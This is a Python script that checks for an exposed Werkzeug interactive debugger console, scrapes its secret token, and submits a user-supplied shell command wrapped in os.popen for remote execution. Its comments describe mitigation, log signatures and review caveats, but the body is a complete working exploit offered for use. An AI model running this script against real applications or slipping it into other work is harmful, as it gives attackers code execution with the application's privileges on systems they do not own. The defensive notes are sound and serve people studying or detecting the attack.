# Checks whether a Werkzeug interactive debugger console is reachable at
# <base-url>/console and, if it is, submits one Python expression to it.
#   sys.argv[1]: base URL of the application being checked
#   sys.argv[2]: shell command string, wrapped below in os.popen(...).read()
#
# Why this matters for defenders: the debugger console evaluates Python inside
# the application process, so a reachable console amounts to code execution
# with the application's privileges. The mitigation is to keep debug mode off
# outside local development and never expose a debug server on a routable
# interface.
# Detection: the requests made below are distinctive in access logs -- a GET of
# /console followed by /console?__debugger__=yes&cmd=...&frm=0&s=... .
#
# NOTE(review): no debugger PIN step appears anywhere in this script, so it
# presumably only gets a result where the PIN prompt is disabled or the
# Werkzeug version predates it -- confirm against the version you run.
# NOTE(review): block indentation was lost when this listing was extracted;
# the statements following each `if` / `else` line are that branch's body.
import requests
import sys
import re
# urllib is imported but not referenced anywhere in the visible script.
import urllib,bs4
# Fetch the console page and look for the banner text the debugger renders.
response = requests.get('%s/console' % (sys.argv[1]))
if "Werkzeug powered traceback interpreter" not in response.text:
# Banner absent: report that the debugger is not enabled and exit with -1.
print("[-] Debug is not enabled")
sys.exit(-1)
# Python expression sent to the console: runs sys.argv[2] through os.popen and
# reads its output. The command string is interpolated as-is.
cmd = '''__import__('os').popen(\'%s\').read();''' % (sys.argv[2])
# Second, identical GET of the console page; its body is what gets searched.
response = requests.get('%s/console' % (sys.argv[1]))
# Collect every run of exactly 20 alphanumeric characters in the page.
# Presumably this is the per-process SECRET the console page embeds -- the
# script only proceeds when exactly one such run is found.
secret = re.findall("[0-9a-zA-Z]{20}",response.text)
if len(secret) != 1:
print("[-] Couldn't get the SECRET")
sys.exit(-1)
else:
secret = secret[0]
print("[+] SECRET is: "+str(secret))
print("[+] Script will try executing %s on %s" % (sys.argv[2],sys.argv[1]))
# Submit the expression to the debugger endpoint for frame 0, passing the
# secret scraped above as the `s` parameter.
response = requests.get("%s/console?__debugger__=yes&cmd=%s&frm=0&s=%s" % (sys.argv[1],str(cmd),secret))
print("[+] response from server")
# Strip the HTML of the reply (lxml parser) and keep the second line of text;
# a reply with fewer than two text lines raises IndexError here.
soup = bs4.BeautifulSoup(response.text,"lxml")
resp = soup.getText().split('\n')[1]
# The kept line contains literal backslash-n sequences (presumably because the
# console echoes the repr of the string); turn them into CRLF line breaks.
print("\r\n".join(resp.split('\\n')))